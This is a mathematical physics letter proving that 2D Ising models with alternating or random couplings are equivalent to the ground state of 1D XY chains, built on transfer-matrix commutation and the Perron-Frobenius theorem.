[ "---\nauthor:\n- Kazuhiko MINAMI\ndate: '9/12/2012'\ntitle: |\n Equivalence between two-dimensional alternating/random Ising model and\\\n the ground state of\\\n one-dimensional alternating/random XY chain.", "\n---\n\n\\\n\nGraduate School of Mathematics, Nagoya University,\\\nNagoya, 464-8602, JAPAN\n\nminami@math.nagoya-u.ac.jp\n\nLet us consider the two-dimensional rectangular Ising model $$\\begin{aligned}\nH_{\\rm I}=-\\sum_{i=1}^M\\sum_{j=1}^N[\nJ_{j}^{h}\\sigma_{ij}^x\\sigma_{ij+1}^x+J_{j}^{v}\\sigma_{ij}^x\\sigma_{i+1j}^x],\n\\label{2DIsing-Hamiltonian}\\end{aligned}$$ where $\\{\\sigma_{ij}^k\\} \\:(k=x, y, z)$ are the Pauli operators satisfying $\\sigma_{i+Mj}^k=\\sigma_{ij}^k$ and $\\sigma_{ij+N}^k=\\sigma_{ij}^k$. The partition function of the model (\\[2DIsing-Hamiltonian\\]) is obtained from the maximum eigenvalue of the transfer matrix $$\\begin{aligned}\nV=V_1^{1/2}V_2V_1^{1/2},\n\\label{transfermatrixV}\\end{aligned}$$ where $$\\begin{aligned}\nV_1&=&\\left[\\Pi_{j=1}^N\\frac{e^{K_j^{v}}}{\\cosh K_{j}^{v*}}\\right] \\exp[\\sum_{j=1}^NK_{j}^{v*}\\sigma_{j}^z],\n\\nonumber\\\\\nV_2&=&\\exp[\\sum_{j=1}^NK_{j}^{h}\\sigma_{j}^x\\sigma_{j+1}^x],\\hspace{0.3cm}\nK_{j}^{l}=J_{j}^{l}/k_BT \\:\\:(l=v, h).\\: \n\\nonumber\\end{aligned}$$ Here $\\{\\sigma_{j}^k\\}$ are again the Pauli operators satisfying $\\sigma_{j+M}^k=\\sigma_{j}^k$, and $K_{j}^{v*}$ is the dual interaction of $K_{j}^{v}$ defined by $\\tanh K_{j}^{v*}=\\exp(-2K_{j}^{v})$.\n\nSuzuki derived[@71SuzukiLetter] [@71Suzuki] that the transfer matrix (\\[transfermatrixV\\]) with the uniform interactions $K_{j}^{v}=K^{v}$ and $K_{j}^{h}=K^{h}$ commute with the Hamiltonian of the one-dimensional quantum XY model $$\\begin{aligned}\nH_{\\rm XY}=-\\sum_{j=1}^N[\nJ_j^x\\sigma_{j}^x\\sigma_{j+1}^x+J_j^y\\sigma_{j}^y\\sigma_{j+1}^y]\n-\\sum_{j=1}^N \\mu H_j\\sigma_{j}^z,\n\\label{1DXY-Hamiltonian}\\end{aligned}$$ with the uniform interactions $J_j^k=J^k \\:(k=x, y)$ and the uniform external fields $H_j=H$. He showed that two operators $V$ and $H_{\\rm XY}$ commute when the coupling parameters satisfy the condition that $$\\begin{aligned}\nJ^y/J^x=\\tanh^2K^{v*},\n\\label{cond-uniform-JJ}\\\\\n\\mu H/J^x=2\\tanh K^{v*}\\coth 2K^{h}. ", "\n\\label{cond-uniform-H}\\end{aligned}$$ Hence $V$ and $H_{\\rm XY}$ can be diagonalized with a common basis set of eigenvectors. ", "In particular, the eigenstate for the maximum eigenvalue of $V$ coincides with the ground state of $H_{\\rm XY}$, and hence the thermodynamic properties, such as correlation functions and critical singularities of the two-dimensional Ising model are related to those obtained in the ground state of the one-dimensional quantum XY model.", "\n\nIn this letter, it is derived that this equivalence can be extended to the models with general coupling parameters including alternating and random interactions and external fields with periodic or free boundary conditions. ", "The condition $$\\begin{aligned}\n[V, H_{\\rm XY}]=0,\n\\label{comrel}\\end{aligned}$$ is equivalent to $$\\begin{aligned}\nV_2V_1^{1/2}H_{\\rm XY}V_1^{-1/2}V_2^{-1}=V_1^{-1/2}H_{\\rm XY}V_1^{1/2}. ", "\n\\label{comrel2}\\end{aligned}$$ One obtains $$\\begin{aligned}\nV_1^{1/2}H_{\\rm XY}V_1^{-1/2}=\\hspace{5.5cm}\n\\nonumber\\\\\n-\\sum_{j=1}^N[\nJ_j^x\n(c_j^+\\sigma_{j}^x\\sigma_{j+1}^x-c_j^-\\sigma_{j}^y\\sigma_{j+1}^y\n+s_j^+i\\sigma_{j}^y\\sigma_{j+1}^x+s_j^-i\\sigma_{j}^x\\sigma_{j+1}^y)\n\\nonumber\\\\\n+J_j^y\n(-c_j^-\\sigma_{j}^x\\sigma_{j+1}^x+c_j^+\\sigma_{j}^y\\sigma_{j+1}^y\n-s_j^-i\\sigma_{j}^y\\sigma_{j+1}^x-s_j^+i\\sigma_{j}^x\\sigma_{j+1}^y)\n]\n\\nonumber\\\\\n-\\sum_{j=1}^N \\mu H_j\\sigma_{j}^z,\\hspace{1.2cm}\\end{aligned}$$ where $$\\begin{aligned}\nc_j^\\pm\n&=&\\frac{1}{2}[\\cosh(K_{j}^{v*}+K_{j+1}^{v*})\\pm\\cosh(K_{j}^{v*}-K_{j+1}^{v*})]\n\\nonumber\\\\\ns_j^\\pm\n&=&\\frac{1}{2}[\\sinh(K_{j}^{v*}+K_{j+1}^{v*})\\pm\\sinh(K_{j}^{v*}-K_{j+1}^{v*})].", "\n\\nonumber\\end{aligned}$$ The coefficient of the term $\\sigma_{j}^y\\sigma_{j+1}^y$ vanishes if we assume $$\\begin{aligned}\nJ_j^xc_j^-=J_j^yc_j^+. ", "\n\\label{cond-general-1}\\end{aligned}$$ Then it is straightforward to derive that (\\[comrel2\\]) is satisfied if we assume $$\\begin{aligned}\n\\mu H_j &=&\n\\mu H_j {\\tilde c}_j^+-{\\tilde J}_{j-1}^-[+-]_j-{\\tilde J}_{j}^+[-+]_j\n\\nonumber\\\\\n0&=&\n\\mu H_j {\\tilde c}_j^--{\\tilde J}_{j-1}^-[-+]_j-{\\tilde J}_{j}^+[+-]_j\n\\nonumber\\\\\n-{\\tilde J}_{j-1}^-&=&\n(-\\mu H_j)[+-]_j+{\\tilde J}_{j-1}^-{\\tilde c}_j^++{\\tilde J}_{j}^+{\\tilde c}_j^-\n\\nonumber\\\\\n-{\\tilde J}_{j}^+&=&\n(-\\mu H_j)[-+]_j+{\\tilde J}_{j-1}^-{\\tilde c} _j^-+{\\tilde J}_{j}^+{\\tilde c}_j^+,\n\\label{cond-general-2}\\end{aligned}$$ where ${\\tilde J}_{j}^\\pm=s_j^\\pm J_j^x-s_j^\\mp J_j^y$, and $$\\begin{aligned}\n{\\tilde c}_j^\\pm\n&=&\\frac{1}{2}[\\cosh(2K_{j-1}^{h}+2K_{j}^{h})\\pm\\cosh(2K_{j-1}^{h}-2K_{j}^{h})]\n\\nonumber\\\\\n{\\tilde s}_j^\\pm\n&=&\\frac{1}{2}[\\frac{\\sinh(2K_{j-1}^{h}+2K_{j}^{h})}{2K_{j-1}^{h}+2K_{j}^{h}}\\pm\\frac{\\sinh(2K_{j-1}^{h}-2K_{j}^{h})}{2K_{j-1}^{h}-2K_{j}^{h}}],\n\\label{def-coeff}\\end{aligned}$$ and the symbols $[+-]_j$ and $[-+]_j$ denote $$\\begin{aligned}\n[\\pm, \\mp]_j=2K_{j-1}^{h}{\\tilde s}_j^\\pm+2K_{j}^{h}{\\tilde s}_j^\\mp.", "\n\\nonumber\\end{aligned}$$ From the equation (\\[cond-general-1\\]), $J_j^x$ and $J_j^y$ can be written as $$\\begin{aligned}\nJ_j^x &=&(\\cosh K_{j}^{v*})(\\cosh K_{j+1}^{v*}) \\:\\tau_j,\\nonumber\\\\\nJ_j^y &=&(\\sinh K_{j}^{v*})(\\sinh K_{j+1}^{v*}) \\:\\tau_j . ", "\n\\label{cond-JJ}\\end{aligned}$$ Therefore, $V$ and $H_{\\rm XY}$ commute if (\\[cond-general-2\\]) and (\\[cond-JJ\\]) are satisfied.", "\n\nThere are solutions for the equations (\\[cond-general-1\\]) and (\\[cond-general-2\\]) in the following cases:\n\n1-1) Uniform interactions: The interactions of the Ising model are uniform, $K_j^v=K^v$ and $K_j^h=K^h$. In this case, $c_j^\\pm=c^\\pm$, $s_j^\\pm=s$, ${\\tilde c}_j^\\pm={\\tilde c}^\\pm$, and ${\\tilde s}_j^\\pm={\\tilde s}^\\pm$, where $$\\begin{aligned}\nc^\\pm&=&\\frac{1}{2}[\\cosh 2K^{v*}\\pm 1], \\hspace{0.3cm}\ns=\\frac{1}{2}\\sinh 2K^{v*},\\nonumber\\\\\n{\\tilde c}^\\pm&=&\\frac{1}{2}[\\cosh 4K^{h}\\pm 1], \\hspace{0.3cm}\n{\\tilde s}^\\pm=\\frac{1}{2}[\\frac{\\sinh 4K^{h}}{4K^{h}}\\pm 1]. ", "\\nonumber\\end{aligned}$$ Assuming the uniform interactions $J_j^k=J^k \\:(k=x, y)$ and the uniform external fields $H_j=H$, the equations in (\\[cond-JJ\\]) result in (\\[cond-uniform-JJ\\]), and four equations in (\\[cond-general-2\\]) reduce to one identical condition $$\\begin{aligned}\n\\mu H=2s(J^x-J^y)\\frac{\\sinh 4K^h}{\\cosh 4K^h-1}, \n\\label{cond-H}\\end{aligned}$$ which results in (\\[cond-uniform-H\\]).", "\n\n1-2) Alternating-sign $K_j^h$: Let us consider the case in which the vertical interactions of the Ising model are uniform, $K_j^v=K^v$, and the horizontal interactions alternate in sign as $K_j^h=(-1)^j K^h$. In this case, $c_j^\\pm=c^\\pm$, $s_j^\\pm=s$, ${\\tilde c}_j^\\pm=\\pm{\\tilde c}^\\pm$, and ${\\tilde s}_j^\\pm=\\pm{\\tilde s}^\\pm$. Assuming $J_j^k=(-1)^j J^k \\:(k=x, y)$, i.e. $\\tau_j=(-1)^j \\tau$, we again obtain (\\[cond-H\\]).", "\n\n1-3) Alternating $K_j^v$: Let us consider the case in which the vertical interactions of the Ising model alternate as $K_j^v=K_{\\rm A}^v$ for $j=$ odd and $K_j^v=K_{\\rm B}^v$ for $j=$ even, and the horizontal interactions are uniform, $K_j^h=K^h$. In this case $c_j^\\pm=c_{\\rm AB}^\\pm$, $s_j^\\pm=s_{\\rm AB}^\\pm$ for $j=$ odd and $s_j^\\pm=s_{\\rm AB}^\\mp$ for $j=$ even, ${\\tilde c}_j^\\pm={\\tilde c}^\\pm$, and ${\\tilde s}_j^\\pm={\\tilde s}^\\pm$, where $c_{\\rm AB}^\\pm$ and $s_{\\rm AB}^\\pm$ are obtained from (\\[def-coeff\\]) substituting $K_j^v=K_{\\rm A}^v$ and $K_{j+1}^v=K_{\\rm B}^v$. Assuming $\\tau_j=\\tau$, the equations in (\\[cond-general-2\\]) reduce to one condition that results in alternating external fields $$\\begin{aligned}\n\\mu H_j=2\\:(\\frac{1}{2}\\sinh 2K_j^{v*})\\: \\tau\\frac{\\sinh 4K^h}{\\cosh 4K^h-1}. ", " \n\\nonumber\\end{aligned}$$ In this case, $H_j$ are alternating for $j$ being even and odd, but $J_j^x$ and $J_j^x$ are uniform, i.e. $J_j^x=J^x=(\\cosh K_{\\rm A}^{v*})(\\cosh K_{\\rm B}^{v*}) \\:\\tau$ and $J_j^y=J^y=(\\sinh K_{\\rm A}^{v*})(\\sinh K_{\\rm B}^{v*}) \\:\\tau$. We assume that $K_{\\rm A}^v$ and $K_{\\rm B}^v$ have the same sign so that the couplings of the XY model remain real (note that the dual interaction of $-K^v$ is $(-K^v)^*=K^{v*}\\pm\\pi i/2$).", "\n\nTwo cases 1-2) and 1-3) are not exclusive. ", "The Ising model with alternating-sign $K_j^h$ and alternating $K_j^v$ has its equivalent XY chain.", "\n\n1-4) Random-sign $K_j^h$: Let us consider the case where the horizontal interactions of the Ising model have the same absolute value but random signs, $K_j^h=\\epsilon_j K^h$, where $\\epsilon_j=\\pm 1$. In this case we obtain $c_j^\\pm=c^\\pm$, $s_j^\\pm=s$, and also obtain that ${\\tilde c}_j^\\pm={\\tilde c}^\\pm$ and ${\\tilde s}_j^\\pm={\\tilde s}^\\pm$ for $\\epsilon_{j-1}=\\epsilon_j$, and ${\\tilde c}_j^\\pm=\\pm{\\tilde c}^\\pm$ and ${\\tilde s}_j^\\pm=\\pm{\\tilde s}^\\pm$ for $\\epsilon_{j-1}=-\\epsilon_j$. Assuming the sign of the interactions as $J_j^k=\\epsilon_j J^k \\:(k=x, y)$, i.e. $\\tau_j=\\epsilon_j \\tau$, we again obtain the solution (\\[cond-H\\]).", "\n\n1-5) Arbitrary $K_j^v$: Let us consider the case where the vertical interactions of the Ising model $\\{K_j^{v}\\}$ have arbitrary strength with the same sign. ", "A solution exists provided that ${\\tilde J}_{j-1}^-={\\tilde J}_{j}^+$ for each $j$. In this case, $\\tau_j=\\tau$ in (\\[cond-JJ\\]) and the external fields are obtained as $$\\begin{aligned}\n\\mu H_j=2s_j \\tau\\frac{\\sinh 4K^h}{\\cosh 4K^h-1},\\hspace{0.2cm}\ns_j=\\frac{1}{2}\\sinh 2K_j^{v*}. ", "\n\\label{1-5-H}\\end{aligned}$$\n\nThe cases 1-2) and 1-3) are special cases of 1-4) and 1-5), respectively. ", "Again two conditions 1-4) and 1-5) are not exclusive. ", "Assuming 1-4), $K_j^h=\\epsilon_j K^h$ and $J_j^k=\\epsilon_j J^k \\:(k=x, y)$, a solution for 1-5) exists when ${\\tilde J}_{j-1}^-= {\\tilde J}_{j}^+$. The external fields are obtained from (\\[1-5-H\\]).", "\n\nFor all of these cases, from 1-1) to 1-5), a solution exists 2-1) with the periodic boundary condition, and 2-2) with the free boundary condition. ", "Assuming that $K_N^h=0$, we obtain ${\\tilde c}_{N}^+=\\cosh 2 K^h$, ${\\tilde c}_{N}^-=0$, ${\\tilde s}_{N}^+=\\sinh 2 K^h/2 K^h$ and ${\\tilde s}_{N}^-=0$. Assuming a finite XY chain $\\tau_N=0$, and hence ${\\tilde J}_{N}^+=0$, the condition (\\[cond-general-1\\]) for $j=N$ is satisfied with $0=0$, and (\\[cond-general-2\\]) for $j=N$ have a solution $$\\begin{aligned}\n\\mu H_N={\\tilde J}_{N-1}^-\\frac{\\sinh 2K^h}{\\cosh 2K^h-1}. ", " \n\\nonumber\\end{aligned}$$\n\nSome of these systems 1-1)-1-5), with 2-1) or 2-2) have been introduced in connection with experiments and theoretical interests.", "\n\nFisher and Ferdinand calculated[@67Fisher] the free energies of two-dimensional Ising models on various lattices with various boundary conditions. ", "Their motivation was to explain the shifts and rounding of the specific heat maximum observed in experiments, in terms of the effects of microcrystalline structure. ", "They introduced a grain boundary in which a vertical ladder of $j$ horizontal bonds has modified interactions $\\xi J$. Their case with $\\xi=0$ and $j\\to\\infty$ corresponds to our case 1-1) with 2-2).", "\n\nThe two-dimensional Ising model with the periodic boundary condition in the horizontal direction and the free boundary conditions in the vertical direction was considered in a study by Schultz et al.[@64SchultzMattisLieb], in which they diagonalized the model as a many-fermion system and obtained the free energy. ", "Abraham solved[@71Abraham] the eigenvalue problem for the transfer matrix of the rectangular Ising model with the periodic boundary condition in the vertical direction and the free boundary conditions in the horizontal direction, and investigated the detailed band structure. ", "This model corresponds to the case 1-1) with 2-2).", "\n\nThe Ising model on a cylinder with the boundary condition that the spins on one edge are fixed to be up and the spins on the other edge are fixed to be down[@71AbrahamGallavotti], and that with another boundary condition that the spins on the two edges are fixed to be up[@73Abraham], were considered in order to shed light on the surface tension problem between two oppositely magnetized phases.", "\n\nMcCoy and Wu[@68McCoy] considered the rectangular Ising model with uniform horizontal interactions, and vertical interactions that vary randomly from row to row, with the periodic boundary condition in the horizontal direction, and with the free boundary conditions in the vertical direction. ", "They attempted to explain experiments that showed that the specific heat is a smooth function at $T_c$. They suspected that this effect was due to the presence of random impurities. ", "This model coincides with our case 1-4) with 2-2) if the distribution of the random interactions is assumed to be random $\\pm J$, though they assumed a narrow power law distribution function in their calculations. ", "Their distribution function can be introduced in our case 1-5) with 2-2), and it is not unreasonable to expect similar behavior in our system. ", "They obtained the result that the specific heat is not divergent and infinitely differentiable at and near $T_c$ though it is not analytic. ", "It was also derived in another paper [@69McCoy] that the usual parametrization in terms of critical exponents does not describe the critical behavior of this model.", "\n\nShanker and Murthy[@87ShankarMurthyRC][@87ShankarMurthy] considered a model in which the vertical interactions are fixed and ferromagnetic, and the horizontal interactions are equal in each row and vary randomly in sign and in magnitude. ", "Their model generally includes frustration. ", "They assumed the periodic boundary conditions in two directions. ", "This model corresponds to our case 1-5) with 2-1), provided that the horizontal interactions are random but have the same sign. ", "They mapped the problem to a collection of one-dimensional random field problems, and identified three phase transitions.", "\n\nThe commutation relation (\\[comrel\\]) certifies that $V$ and $H_{\\rm XY}$ can be diagonalized simultaneously. ", "Moreover, it can be derived that the eigenstate for the maximum eigenvalue of $V$ coincides with the ground state of $H_{\\rm XY}$, and hence the thermodynamic properties of the two-dimensional Ising models and the ground state properties of the one-dimensional XY models are related to each other.", "\n\nIn order to show this coincidence, let us consider the general properties of $V$ and $H_{\\rm XY}$. The matrix $\\sum_{j=1}^NK_{j}^{v*}\\sigma_{j}^z$ is diagonal, and hence all the elements of $\\exp[\\sum_{j=1}^NK_{j}^{v*}\\sigma_{j}^z]$ are non-negative. ", "When $K_j^h\\geq 0$, the elements of $\\sum_{j=1}^NK_{j}^{h}\\sigma_{j}^x\\sigma_{j+1}^x$ are non-negative and hence the elements of $\\exp[\\sum_{j=1}^NK_{j}^{h}\\sigma_{j}^x\\sigma_{j+1}^x]$ are also non-negative. ", "Therefore, in this case, all the matrix elements of $V$ are non-negative. ", "Because the Ising interactions are written as $\\sigma_{j}^x\\sigma_{j+1}^x\n=s_{j}^+s_{j+1}^++s_{j}^-s_{j+1}^-\n+s_{j}^+s_{j+1}^-+s_{j}^-s_{j+1}^+$, the matrix $V$ becomes block-diagonal and contains two irreducible block elements, one is $V^{(1)}$ which operates on the bases states with even number of up spins and the other is $V^{(2)}$ which operates on the bases states with odd number of up spins: $$\\begin{aligned}\nV=\n\\left[\n\\begin{array}{cc}\nV^{(1)} & O \\\\\nO & V^{(2)}\n\\end{array}\n\\right]. ", "\n\\nonumber\\end{aligned}$$ The block element $V^{(1)}$ is irreducible because $(V^{(1)})^m$ is irreducible for sufficiently large $m$. (This comes from the fact that $(V^{(1)})^m$ cannot be irreducible if $V^{(1)}$ is reducible.) ", "Similarly $V^{(2)}$ is also irreducible. ", "Let $\\Phi_{\\rm I}^{(1)}$ and $\\Phi_{\\rm I}^{(2)}$ be the eigenstates of $V$ for the maximum eigenvalue of $V^{(1)}$ and $V^{(2)}$, respectively. ", "These are expressed as $$\\begin{aligned}\n\\Phi_{\\rm I}^{(1)}=\n\\left[\n\\begin{array}{c}\n\\phi_{\\rm I}^{(1)} \\\\\n{\\bf 0}\n\\end{array}\n\\right],\n\\hspace{0.3cm}\n\\Phi_{\\rm I}^{(2)}=\n\\left[\n\\begin{array}{c}\n{\\bf 0}\\\\\n\\phi_{\\rm I}^{(2)} \n\\end{array}\n\\right],\n\\nonumber\\end{aligned}$$ where $\\phi_{\\rm I}^{(1)}$ and $\\phi_{\\rm I}^{(1)}$ are vectors with $2^N/2$ elements, and ${\\bf 0}$ is the zero vector with $2^N/2$ elements. ", "From the Perron-Frobenius theorem, the elements of $\\phi_{\\rm I}^{(1)}$ and $\\phi_{\\rm I}^{(2)}$ are non-negative. ", "Because the two block elements $V^{(1)}$ and $V^{(2)}$ are irreducible, $\\phi_{\\rm I}^{(1)}$ and $\\phi_{\\rm I}^{(2)}$ are non-degenerate eigenstates of $V^{(1)}$ and $V^{(2)}$, respectively, and the elements of $\\phi_{\\rm I}^{(1)}$ and $\\phi_{\\rm I}^{(2)}$ are all positive.", "\n\nNext let us consider the Hamiltonian $H_{\\rm XY}$ with $J_j^k>0 \\:(k=x, y)$. When we consider a matrix $-H_{\\rm XY}+cI$, where $I$ is the unit matrix and $c$ is a positive and sufficiently large constant. ", "The eigenstates of $-H_{\\rm XY}+cI$ are also the eigenstates of $H_{\\rm XY}$. In particular, the ground state of the Hamiltonian $H_{\\rm XY}$ is the eigenstate for the maximum eigenvalue of $-H_{\\rm XY}+cI$. Because the XY interactions are written as $$\\begin{aligned}\n&&J_j^x\\sigma_{j}^x\\sigma_{j+1}^x+J_j^y\\sigma_{j}^y\\sigma_{j+1}^y=\n\\nonumber\\\\\n&&(J_j^x-J_j^y)(s_{j}^+s_{j+1}^++s_{j}^-s_{j+1}^-)\n+(J_j^x+J_j^y)(s_{j}^+s_{j+1}^-+s_{j}^-s_{j+1}^+), \n\\nonumber\\end{aligned}$$ the Hamiltonian $H_{\\rm XY}$ is block-diagonalized into two blocks with even and odd number of up spins. ", "From (\\[cond-JJ\\]), the interaction constants satisfy $J_j^x>J_j^y$, and hence all the matrix elements of $-H_{\\rm XY}+cI$ are non-negative and the two block elements are irreducible. ", "Let $\\Phi_{\\rm XY}^{(1)}$ and $\\Phi_{\\rm XY}^{(2)}$ be the eigenstate of $H_{\\rm XY}$ for the lowest energy eigenvalue of even and odd block element, respectively. ", "These are expressed as $$\\begin{aligned}\n\\Phi_{\\rm XY}^{(1)}=\n\\left[\n\\begin{array}{c}\n\\phi_{\\rm XY}^{(1)} \\\\\n{\\bf 0} \n\\end{array}\n\\right],\n\\hspace{0.3cm}\n\\Phi_{\\rm XY}^{(2)}=\n\\left[\n\\begin{array}{c}\n{\\bf 0} \\\\\n\\phi_{\\rm XY}^{(2)} \n\\end{array}\n\\right]. ", "\n\\nonumber\\end{aligned}$$ It follows that the elements of $\\phi_{\\rm XY}^{(1)}$ and $\\phi_{\\rm XY}^{(2)}$ are all positive.", "\n\nThe matrices $V$ and $H_{\\rm XY}$ are both Hermitian, and hence their common eigenstates form (or can be arranged to form) an orthogonal basis set. ", "Therefore, any two eigenstates of $V$ and $H_{\\rm XY}$ are orthogonal or identical, or belong to a degenerate eigenspace. ", "Because all the coefficients of $\\phi_{\\rm I}^{(1)}$ and $\\phi_{\\rm XY}^{(1)}$ are all positive, $\\Phi_{\\rm I}^{(1)}$ and $\\Phi_{\\rm XY}^{(1)}$ cannot be orthogonal. ", "Considering the fact that $\\phi_{\\rm I}^{(1)}$ and $\\phi_{\\rm XY}^{(1)}$ are non-degenerate eigenstates of the corresponding block elements, respectively, it follows that $\\Phi_{\\rm I}^{(1)}=\\Phi_{\\rm XY}^{(1)}$ except overall constant. ", "Similarly, we obtain $\\Phi_{\\rm I}^{(2)}=\\Phi_{\\rm XY}^{(2)}$ except overall constant.", "\n\nIn the cases with $K_j^h< 0$ and $J_j^k<0 \\:(k=x, y)$ for some $j$, one can introduce a rotation of $\\pi$ around the $z$ axis in the spin space, and the problem is mapped to one with $K_j^h>0$ and $J_j^k>0 \\:(k=x, y)$, which yields the same result.", "\n\nThe remaining problem is to identify the eigenstate for the maximum eigenvalue of $H_{\\rm I}$ and the ground state of $H_{\\rm XY}$. For the periodic case 1-1) with 2-1), it has been shown in[@71Suzuki] through a direct diagonalization by fermion operators that the eigenstate for the maximum eigenvalue of $V$ is $\\Phi_{\\rm I}^{(1)}$, and that the ground state of $H_{\\rm XY}$ is $\\Phi_{\\rm XY}^{(1)}$.\n\nIn the case of 1-1) with 2-2), the XY model has free ends. ", "The Hamiltonian $H_{\\rm XY}$ is separated into two sectors, one with even number of fermions ( i.e. the block-element with even number of up spins), and the other with odd number of fermions ( i.e. the block-element with odd number of up spins). ", "It is most clearly seen in the calculation by Niemeijer[@67Niemeijer] that the energy eigenvalues and the eigenvectors are obtained from an eigenvalue problem for a symmetric matrix. ", "Hence the XY model with free boundary conditions can be solved, and the ground state is unique and found in the even sector.", "\n\nSchultz et al.[@64SchultzMattisLieb] diagonalized the two-dimensional Ising model with free boundary conditions in one direction. ", "The maximum eigenvalue of the transfer matrix was found in the sector with even number of fermions ( i.e. in the block-element with even number of up spins), and was non-degenerate above $T_c$. Below $T_c$, the maximum eigenvalue of the odd sector becomes degenerate with that of the even sector in the thermodynamic limit.", "\n\nConsequently, we again find, for the case 1-1) with 2-2), that the eigenstate for the maximum eigenvalue of $V$ is $\\Phi_{\\rm I}^{(1)}$, and the ground state of $H_{\\rm XY}$ is $\\Phi_{\\rm XY}^{(1)}$, where $\\Phi_{\\rm I}^{(1)}=\\Phi_{\\rm XY}^{(1)}$ except overall constant.", "\n\nThe cases with $K_j^h< 0$ and $J_j^k<0 \\:(k=x, y)$ for some $j$ can be mapped to the cases with $K_j^h>0$ and $J_j^k>0 \\:(k=x, y)$ by a rotation of $\\pi$ around the $z$ axis in the spin space. ", "Because the energy eigenvalues are invariant by the rotation, the results for 1-1) with 2-1) or 2-2) are still valid in the cases 1-2) and 1-4) with 2-1) or 2-2).", "\n\nFinally, let us consider the cases 1-3) and 1-5) with 2-1) or 2-2). ", "The system with $K_j^h>0$ can be mapped to the system with $K_j^h<0$, and the rectangular Ising model with $K_j^v<0$ and $K_j^h<0$ for all $j$ can be mapped to that with $K_j^v>0$ and $K_j^h>0$. It is easy to check that the corresponding XY models are also mapped each other by a gauge transformation. ", "Therefore, we can assume that $K_j^v>0$ and $K_j^h>0$ for all $j$. Then the elements of $V_1$ and $V_2$ are all non-negative because $K_j^{v*}$ are real and $K_j^h$ are positive. ", "Without loss of generality, one can assume that $\\tau_j>0$ in (\\[cond-JJ\\]) and then the interactions $J_j^x$ and $J_j^y$ satisfy $J_j^x-J_j^y>0$ and $J_j^x+J_j^y>0$. All the non-zero elements of $V$ and $-H_{\\rm XY}+cI$ remain non-zero as long as $K_j^v$ and $K_j^h$ remain real, finite and non-zero.", "\n\nFrom the Perron-Frobenius theorem, the maximum eigenvalue of each block element is non-degenerate. ", "When we assume that the eigenvalues are continuous in terms of the coupling constants, this leads to the result that level crossings do not occur in each block element as long as all the non-zero matrix elements remain non-zero. ", "Therefore $\\phi_{\\rm I}^{(1)}=\\phi_{\\rm XY}^{(1)}$ is the eigenstate for the maximum eigenvalue of the even block element, and $\\phi_{\\rm I}^{(2)}=\\phi_{\\rm XY}^{(2)}$ is that of the odd block element, for real, finite and non-zero $K_j^v$ and $K_j^h$. The state $\\Phi_{\\rm I}^{(1)}=\\Phi_{\\rm XY}^{(1)}$ is the eigenstate for the maximum eigenvalue of $V$ as well as the ground state of $H_{\\rm XY}$, at least in a neighborhood of the uniform point 1-1).", "\n\nThe correlation functions of the two-dimensional Ising model and those in the ground state $\\Phi_{\\rm XY}^{(1)}$ of the one-dimensional XY model are related to each other. ", "Let $f(\\sigma)$ be a product of the Pauli operators $\\sigma_{j}^x$. When one take the limit $M\\to\\infty$ in the equation $$\\begin{aligned}\n\\frac{{\\rm Tr}f(\\sigma)(V_1V_2)^M}{{\\rm Tr}(V_1V_2)^M}\n=\n\\frac{{\\rm Tr}f(\\sigma)V_1^{1/2}V^MV_1^{-1/2}}{{\\rm Tr}V^M},\n\\nonumber\\end{aligned}$$ one obtains the relation of the expectation values as $$\\begin{aligned}\n\\langle f(\\sigma)\\rangle_{\\rm I}\n=\n\\langle V_1^{-1/2}f(\\sigma)V_1^{1/2}\\rangle_{\\rm XY}, \n\\nonumber\\end{aligned}$$ where $\\langle f(\\sigma)\\rangle_{\\rm I}$ is the expectation value of a spin product on the same row of the Ising model. ", "In particular, the two-spin correlation functions satisfy the relation $$\\begin{aligned}\n\\langle \\sigma_{ij}^x\\sigma_{ik}^x\\rangle_{\\rm I}\n=\n\\cosh K_j^v\\cosh K_k^v\n\\langle \\sigma_{j}^x\\sigma_{k}^x\\rangle_{\\rm XY}\n-\\sinh K_j^v\\sinh K_k^v\n\\langle \\sigma_{j}^y\\sigma_{k}^y\\rangle_{\\rm XY},\n\\nonumber\\end{aligned}$$ where we used the fact that all the elements of $\\Phi_{\\rm XY}^{(1)}$ are real, and hence $\\langle \\sigma_{j}^x\\sigma_{k}^y\\rangle_{\\rm XY}=0$ for $j\\neq k$.\n\nAs shown in [@71Suzuki], the critical point $T_c$ of the two-dimensional Ising model corresponds to the critical field $H_c$ of the one-dimensional XY model, and two quivalent models show the same critical singularities.", "\n\nHowever, especially in the cases with random coupling parameters, complex critical behavior can occur depending on the distribution function for $\\{K_j^v\\}$. It is known that the Griffiths-McCoy phase, which was originally found in two-dimensional random Ising models,[@69McCoy][@69Griffiths] appears in the one-dimensional random transverse Ising model,[@95Fisher] and one-dimensional XY model with random interactions and random fields[@96McKenzie]. ", "As mentioned above, it is also found[@87ShankarMurthyRC][@87ShankarMurthy] that the Griffiths-McCoy phase appears in the two-dimensional Ising model with random horizontal interactions, which corresponds to our case 1-5) with 1-1). ", "The relations derived in this letter shows the exact equivalence of certain kind of two-dimensional random Ising models and the one-dimensional random XY models.", "\n\n[99]{} M.Suzuki: Phys. ", "Lett. ", "34A (1971) 94. ", "M.Suzuki: Prog. ", "Theor. ", "Phys. ", "46 (1971) 1337. ", "T.D.Schultz, D.C.Mattis and E.H.Lieb: Rev. Mod. ", "Phys. ", "36 (1964) 856 M.E.Fisher and A.E.Ferdinand: Phys. ", "Rev. Lett. ", "19 (1967) 169. ", "D. B. Abraham: Stud. ", "Appl. ", "Math. ", "50 (1971) 71. ", "D.B.Abraham and G.Gallavotti: Lett. ", "Nuovo Cimento 2 (1971) 143 D.B. Abraham and P. Reed: Phys. ", "Rev. Lett. ", "33 (1974) 377. ", "B.M. McCoy and T. T.Wu: Phys. ", "Rev. 176 (1968) 631. ", "B.M. McCoy: Phys. ", "Rev. Lett. ", "23 (1969) 383. ", "R. Shankar and G. Murthy, Phys. ", "Rev. B 35 (1987) 3671. ", "R. Shankar and G. Murthy, Phys. ", "Rev. B 36 (1987) 536. ", "T. Niemeijer: Physica 36 (1967) 377. ", "R.B. Griffiths: Phys. ", "Rev. Lett. ", "23 (1969) 17. ", "D.S.Fisher: Phys. ", "Rev. B 51 (1995) 6411. ", "R.H. McKenzie: Phys. ", "Rev. Lett. ", "77 (1996) 4804.", "\n" ]
